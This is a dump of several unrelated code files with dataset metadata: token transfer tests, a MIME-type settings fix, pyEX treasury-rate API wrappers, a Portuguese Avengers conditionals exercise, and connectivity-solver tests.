    gauge_v2.approve(spender, 0, {"from": owner})
    with brownie.reverts():
        gauge_v2.transferFrom(owner, receiver, balance, {"from": spender})
def test_transfer_to_self(accounts, gauge_v2):
    """A self-transfer leaves the balance unchanged but still consumes allowance."""
    owner = accounts[0]
    initial = gauge_v2.balanceOf(owner)
    amount = initial // 4
    gauge_v2.approve(owner, initial, {"from": owner})
    gauge_v2.transferFrom(owner, owner, amount, {"from": owner})
    assert gauge_v2.balanceOf(owner) == initial
    assert gauge_v2.allowance(owner, owner) == initial - amount
def test_transfer_to_self_no_approval(accounts, gauge_v2):
    """Even a self-transfer requires an allowance; without one it reverts."""
    owner = accounts[0]
    amount = gauge_v2.balanceOf(owner)
    with brownie.reverts():
        gauge_v2.transferFrom(owner, owner, amount, {"from": owner})
def test_transfer_event_fires(accounts, gauge_v2):
    """A successful transferFrom emits Transfer(owner, receiver, amount)."""
    owner, spender, receiver = accounts[0], accounts[1], accounts[2]
    amount = gauge_v2.balanceOf(owner)
    gauge_v2.approve(spender, amount, {"from": owner})
    tx = gauge_v2.transferFrom(owner, receiver, amount, {"from": spender})
    assert tx.events["Transfer"].values() == [owner, receiver, amount]
| 37.005464
| 92
| 0.715298
| 914
| 6,772
| 5.080963
| 0.084245
| 0.143196
| 0.11025
| 0.165375
| 0.853144
| 0.796512
| 0.77627
| 0.742463
| 0.736003
| 0.72696
| 0
| 0.046508
| 0.133196
| 6,772
| 182
| 93
| 37.208791
| 0.744634
| 0.00251
| 0
| 0.54955
| 0
| 0
| 0.027095
| 0
| 0
| 0
| 0
| 0
| 0.153153
| 1
| 0.171171
| false
| 0
| 0.018018
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0166c7c29c0e1918ca5e93f6a26cc9618b5938f
| 116
|
py
|
Python
|
csiep/settings/__init__.py
|
pkucsie/SIEPServer
|
00b0637eb8302135dfc772fccd18cd749a93e5c6
|
[
"Apache-2.0"
] | 2
|
2021-02-12T10:02:42.000Z
|
2021-03-15T13:08:04.000Z
|
csiep/settings/__init__.py
|
pkucsie/SIEPServer
|
00b0637eb8302135dfc772fccd18cd749a93e5c6
|
[
"Apache-2.0"
] | null | null | null |
csiep/settings/__init__.py
|
pkucsie/SIEPServer
|
00b0637eb8302135dfc772fccd18cd749a93e5c6
|
[
"Apache-2.0"
] | null | null | null |
import mimetypes

# Register explicit MIME types for static assets so they are always served
# with the expected Content-Type, independent of the host OS registry.
for _extension, _mime_type in ((".css", "text/css"), (".js", "text/javascript")):
    mimetypes.add_type(_mime_type, _extension, True)
| 29
| 51
| 0.715517
| 16
| 116
| 5.0625
| 0.5625
| 0.296296
| 0.395062
| 0.493827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094828
| 116
| 3
| 52
| 38.666667
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 0.265487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e032a3aac5c8597910fca3b774559d3982660235
| 17,929
|
py
|
Python
|
pyEX/treasuries/treasuries.py
|
adamklaff/pyEX
|
74a4cfa5978ccff95261aeb54f526dedc579aa6b
|
[
"Apache-2.0"
] | 335
|
2017-11-06T00:45:41.000Z
|
2022-03-14T10:17:36.000Z
|
pyEX/treasuries/treasuries.py
|
adamklaff/pyEX
|
74a4cfa5978ccff95261aeb54f526dedc579aa6b
|
[
"Apache-2.0"
] | 193
|
2018-02-11T21:39:35.000Z
|
2022-02-25T15:46:38.000Z
|
pyEX/treasuries/treasuries.py
|
adamklaff/pyEX
|
74a4cfa5978ccff95261aeb54f526dedc579aa6b
|
[
"Apache-2.0"
] | 92
|
2017-11-10T08:09:35.000Z
|
2022-02-16T19:27:46.000Z
|
# *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from enum import Enum
from functools import lru_cache
from ..common import _timeseriesWrapper, _expire, _UTC
from ..timeseries import timeSeries, timeSeriesDF
class TreasuriesPoints(Enum):
    """Treasury data points

    https://iexcloud.io/docs/api/#treasuries

    Attributes:
        THIRTY: 30 Year constant maturity rate
        TWENTY: 20 Year constant maturity rate
        TEN: 10 Year constant maturity rate
        SEVEN: 7 Year constant maturity rate
        FIVE: 5 Year constant maturity rate
        THREE: 3 Year constant maturity rate
        TWO: 2 Year constant maturity rate
        ONE: 1 Year constant maturity rate
        SIXMONTH: 6 Month constant maturity rate
        THREEMONTH: 3 Month constant maturity rate
        ONEMONTH: 1 Month constant maturity rate
    """

    THIRTY = "DGS30"
    TWENTY = "DGS20"
    TEN = "DGS10"
    SEVEN = "DGS7"
    FIVE = "DGS5"
    THREE = "DGS3"
    TWO = "DGS2"
    ONE = "DGS1"
    SIXMONTH = "DGS6MO"
    THREEMONTH = "DGS3MO"
    ONEMONTH = "DGS1MO"

    @staticmethod
    @lru_cache(1)
    def options():
        """Return a list of the available rates points options"""
        return list(map(lambda c: c.value, TreasuriesPoints))
@_expire(hour=8, tz=_UTC)
def thirtyYear(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 30-year constant maturity rate (``DGS30``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS30", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def thirtyYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 30-year constant maturity rate (``DGS30``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS30", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def twentyYear(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 20-year constant maturity rate (``DGS20``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS20", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def twentyYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 20-year constant maturity rate (``DGS20``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS20", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def tenYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
    """Rates data: 10-year constant maturity rate (``DGS10``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS10", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def tenYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 10-year constant maturity rate (``DGS10``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS10", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def sevenYear(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 7-year constant maturity rate (``DGS7``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS7", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def sevenYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 7-year constant maturity rate (``DGS7``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS7", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def fiveYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
    """Rates data: 5-year constant maturity rate (``DGS5``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS5", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def fiveYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 5-year constant maturity rate (``DGS5``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS5", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def threeYear(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 3-year constant maturity rate (``DGS3``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS3", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def threeYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 3-year constant maturity rate (``DGS3``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS3", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def twoYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
    """Rates data: 2-year constant maturity rate (``DGS2``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS2", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def twoYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 2-year constant maturity rate (``DGS2``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS2", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def oneYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
    """Rates data: 1-year constant maturity rate (``DGS1``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS1", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def oneYearDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 1-year constant maturity rate (``DGS1``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS1", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def sixMonth(token="", version="stable", filter="", format="json", **timeseries_kwargs):
    """Rates data: 6-month constant maturity rate (``DGS6MO``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS6MO", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def sixMonthDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 6-month constant maturity rate (``DGS6MO``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS6MO", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def threeMonth(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 3-month constant maturity rate (``DGS3MO``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS3MO", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def threeMonthDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 3-month constant maturity rate (``DGS3MO``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS3MO", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def oneMonth(token="", version="stable", filter="", format="json", **timeseries_kwargs):
    """Rates data: 1-month constant maturity rate (``DGS1MO``).

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS1MO", token=token,
                  version=version, filter=filter, format=format)
    return timeSeries(**params, **timeseries_kwargs)
@_expire(hour=8, tz=_UTC)
def oneMonthDF(
    token="", version="stable", filter="", format="json", **timeseries_kwargs
):
    """Rates data: 1-month constant maturity rate (``DGS1MO``), DataFrame form.

    https://iexcloud.io/docs/api/#treasuries

    Args:
        token (str): Access token
        version (str): API version
        filter (str): https://iexcloud.io/docs/api/#filter-results
        format (str): return format, defaults to json

    Supports all kwargs from `pyEX.timeseries.timeSeries`

    Returns:
        dict or DataFrame: result
    """
    _timeseriesWrapper(timeseries_kwargs)
    params = dict(id="TREASURY", key="DGS1MO", token=token,
                  version=version, filter=filter, format=format)
    return timeSeriesDF(**params, **timeseries_kwargs)
| 24.936022
| 88
| 0.612248
| 1,926
| 17,929
| 5.628245
| 0.071651
| 0.073063
| 0.062269
| 0.078875
| 0.90369
| 0.90369
| 0.898985
| 0.898985
| 0.898985
| 0.898985
| 0
| 0.006287
| 0.263651
| 17,929
| 718
| 89
| 24.970752
| 0.814801
| 0.462658
| 0
| 0.797468
| 0
| 0
| 0.064867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072785
| false
| 0
| 0.012658
| 0
| 0.196203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0edbb9e89b30ccb55617f13ea9979f0d55cc32a5
| 4,980
|
py
|
Python
|
Estrutura condicional/Vingadores.py
|
ThiagoAciole/Logica_Algoritimos_Python
|
f687d09d0f90d6b0c349bcd1fada4c9cc6516a92
|
[
"MIT"
] | null | null | null |
Estrutura condicional/Vingadores.py
|
ThiagoAciole/Logica_Algoritimos_Python
|
f687d09d0f90d6b0c349bcd1fada4c9cc6516a92
|
[
"MIT"
] | null | null | null |
Estrutura condicional/Vingadores.py
|
ThiagoAciole/Logica_Algoritimos_Python
|
f687d09d0f90d6b0c349bcd1fada4c9cc6516a92
|
[
"MIT"
] | null | null | null |
# Vingadores
# Reads a hero name, a power and an energy level from stdin and prints whether
# that hero defeats Thanos.  Accented string literals were reconstructed from a
# mojibake-corrupted source (U+FFFD replacement characters); all other message
# wording is kept verbatim for the judge, including its quirks ("Viuva Negra"
# unaccented on success, "derrotar o Thanos" in the low-energy messages).
lista = ["Homem de Ferro", "Hulk", "Capitão América", "Thor", "Gavião Arqueiro", "Viúva Negra"]
vingador = str(input())
if vingador in lista:
    poder = str(input())
    energia = int(input())
if vingador not in lista:
    # BUGFIX: restored "Inválido" (was mojibake "Inv�lido").
    print("Vingador Inválido")
else:
    if vingador == "Homem de Ferro":
        if poder != "Armadura de Ferro":
            print("Homem de Ferro NAO conseguiu derrotar Thanos")
        if poder == "Armadura de Ferro" and energia >= 10:
            print("Homem de Ferro conseguiu derrotar Thanos")
        if poder == "Armadura de Ferro" and energia < 10:
            print("Homem de Ferro NAO conseguiu derrotar o Thanos, chamem outro Vingador")
        # Echo which hero owns the (wrong) power that was typed in.
        if poder == "Força Bruta":
            print("Esse é o poder do Hulk")
        if poder == "Escudo":
            print("Esse é o poder do Capitão América")
        if poder == "Martelo":
            print("Esse é o poder do Thor")
        if poder == "Arco e Flecha":
            print("Esse é o poder do Gavião Arqueiro")
        if poder == "Inteligencia":
            print("Esse é o poder do Viúva Negra")
    elif vingador == "Hulk":
        if poder != "Força Bruta":
            print("Hulk NAO conseguiu derrotar Thanos")
        if poder == "Força Bruta" and energia >= 5:
            print("Hulk conseguiu derrotar Thanos")
        if poder == "Força Bruta" and energia < 5:
            print("Hulk NAO conseguiu derrotar o Thanos, chamem outro Vingador")
        if poder == "Armadura de Ferro":
            print("Esse é o poder do Homem de Ferro")
        if poder == "Escudo":
            print("Esse é o poder do Capitão América")
        if poder == "Martelo":
            print("Esse é o poder do Thor")
        if poder == "Arco e Flecha":
            print("Esse é o poder do Gavião Arqueiro")
        if poder == "Inteligencia":
            print("Esse é o poder do Viúva Negra")
    elif vingador == "Capitão América":
        if poder != "Escudo":
            print("Capitão América NAO conseguiu derrotar Thanos")
        if poder == "Escudo" and energia >= 7:
            print("Capitão América conseguiu derrotar Thanos")
        if poder == "Escudo" and energia < 7:
            print("Capitão América NAO conseguiu derrotar o Thanos, chamem outro Vingador")
        if poder == "Força Bruta":
            print("Esse é o poder do Hulk")
        if poder == "Armadura de Ferro":
            print("Esse é o poder do Homem de Ferro")
        if poder == "Martelo":
            print("Esse é o poder do Thor")
        if poder == "Arco e Flecha":
            print("Esse é o poder do Gavião Arqueiro")
        if poder == "Inteligencia":
            print("Esse é o poder do Viúva Negra")
    elif vingador == "Thor":
        if poder != "Martelo":
            print("Thor NAO conseguiu derrotar Thanos")
        if poder == "Martelo" and energia >= 4:
            print("Thor conseguiu derrotar Thanos")
        # BUGFIX: the original compared poder == "Thor" here, so the
        # low-energy message could never be printed.
        if poder == "Martelo" and energia < 4:
            print("Thor NAO conseguiu derrotar o Thanos, chamem outro Vingador")
        if poder == "Força Bruta":
            print("Esse é o poder do Hulk")
        if poder == "Escudo":
            print("Esse é o poder do Capitão América")
        if poder == "Armadura de Ferro":
            print("Esse é o poder do Homem de Ferro")
        if poder == "Arco e Flecha":
            print("Esse é o poder do Gavião Arqueiro")
        if poder == "Inteligencia":
            print("Esse é o poder do Viúva Negra")
    elif vingador == "Gavião Arqueiro":
        if poder != "Arco e Flecha":
            print("Gavião Arqueiro NAO conseguiu derrotar Thanos")
        if poder == "Arco e Flecha" and energia >= 12:
            print("Gavião Arqueiro conseguiu derrotar Thanos")
        # BUGFIX: the original compared poder == "Gavião Arqueiro" here, so
        # the low-energy message could never be printed.
        if poder == "Arco e Flecha" and energia < 12:
            print("Gavião Arqueiro NAO conseguiu derrotar o Thanos, chamem outro Vingador")
        if poder == "Força Bruta":
            print("Esse é o poder do Hulk")
        if poder == "Escudo":
            print("Esse é o poder do Capitão América")
        if poder == "Martelo":
            print("Esse é o poder do Thor")
        if poder == "Armadura de Ferro":
            print("Esse é o poder do Homem de Ferro")
        if poder == "Inteligencia":
            print("Esse é o poder do Viúva Negra")
    elif vingador == "Viúva Negra":
        # TODO(review): this branch tests "Inteligência" (accented) while the
        # echo messages in the other branches test "Inteligencia" — confirm
        # which spelling the judge expects and unify.
        if poder != "Inteligência":
            print("Viúva Negra NAO conseguiu derrotar Thanos")
        if poder == "Inteligência" and energia >= 20:
            print("Viuva Negra conseguiu derrotar Thanos")
        if poder == "Inteligência" and energia < 20:
            print("Viúva Negra NAO conseguiu derrotar Thanos, chamem outro Vingador")
        if poder == "Força Bruta":
            print("Esse é o poder do Hulk")
        if poder == "Escudo":
            print("Esse é o poder do Capitão América")
        if poder == "Martelo":
            print("Esse é o poder do Thor")
        if poder == "Arco e Flecha":
            print("Esse é o poder do Gavião Arqueiro")
        if poder == "Armadura de Ferro":
            print("Esse é o poder do Homem de Ferro")
| 41.848739
| 95
| 0.579317
| 757
| 4,980
| 3.915456
| 0.083223
| 0.033738
| 0.101215
| 0.111336
| 0.908907
| 0.853914
| 0.815115
| 0.800945
| 0.759784
| 0.74359
| 0.015863
| 0.005138
| 0.296586
| 4,980
| 119
| 96
| 41.84874
| 0.818441
| 0.002008
| 0
| 0.545455
| 0
| 0
| 0.482294
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.445455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
0ef6c87e77db784601b0dd129410452baea2c239
| 2,655
|
py
|
Python
|
tests/test_full_adaptive.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_full_adaptive.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_full_adaptive.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from cops.graph import Graph
from cops.problem import ConnectivityProblem
def import_gurobi():
    """Return True if the optional ``gurobipy`` solver package is importable.

    Tests use this to skip the actual solve step when Gurobi is not installed.
    """
    try:
        import gurobipy  # noqa: F401 -- imported only to probe availability
        return True
    except ModuleNotFoundError:
        # BUGFIX: dropped the unused ``as e`` binding on the except clause.
        return False
def test_horiz1():
    """Adaptive solve over a 1-step horizon on a 4-node directed path graph."""
    graph = Graph()

    # Directed path 0 -> 1 -> 2 -> 3 used for both edge types (one way).
    transition_edges = [0, 1, 2, 3]
    connectivity_edges = [0, 1, 2, 3]
    graph.add_transition_path(transition_edges)
    graph.add_connectivity_path(connectivity_edges)

    # agent -> initial node
    graph.init_agents({0: 0, 1: 1, 2: 3})

    # Connectivity problem: horizon 1, source agent 2 held static.
    problem = ConnectivityProblem()
    problem.graph = graph
    problem.T = 1
    problem.src = [2]
    problem.static_agents = [2]

    if import_gurobi():
        problem.solve_adaptive()
        # (agent, time) -> expected node; agent 2 is fixed at node 3.
        expected = {
            (0, 0): 0, (0, 1): 1,
            (1, 0): 1, (1, 1): 2,
            (2, 0): 3, (2, 1): 3,
        }
        for key, node in expected.items():
            np.testing.assert_equal(problem.traj[key], node)
def test_horiz2():
    """Adaptive solve over a 2-step horizon with agents 0 and 2 held static."""
    graph = Graph()

    # Directed path 0 -> 1 -> 2 -> 3 used for both edge types (one way).
    transition_edges = [0, 1, 2, 3]
    connectivity_edges = [0, 1, 2, 3]
    graph.add_transition_path(transition_edges)
    graph.add_connectivity_path(connectivity_edges)

    # agent -> initial node
    graph.init_agents({0: 0, 1: 1, 2: 3})

    # Connectivity problem: horizon 2, source agent 2, agents 0 and 2 static.
    problem = ConnectivityProblem()
    problem.graph = graph
    problem.T = 2
    problem.src = [2]
    problem.static_agents = [0, 2]

    if import_gurobi():
        problem.solve_adaptive()
        # (agent, time) -> expected node; agents 0 and 2 never move.
        expected = {
            (0, 0): 0, (0, 1): 0, (0, 2): 0,
            (1, 0): 1, (1, 1): 2, (1, 2): 1,
            (2, 0): 3, (2, 1): 3, (2, 2): 3,
        }
        for key, node in expected.items():
            np.testing.assert_equal(problem.traj[key], node)
| 27.65625
| 77
| 0.629002
| 390
| 2,655
| 4.164103
| 0.166667
| 0.083128
| 0.138547
| 0.184729
| 0.87931
| 0.87931
| 0.87931
| 0.862685
| 0.786946
| 0.786946
| 0
| 0.044784
| 0.259887
| 2,655
| 95
| 78
| 27.947368
| 0.781679
| 0.235405
| 0
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.277778
| 1
| 0.055556
| false
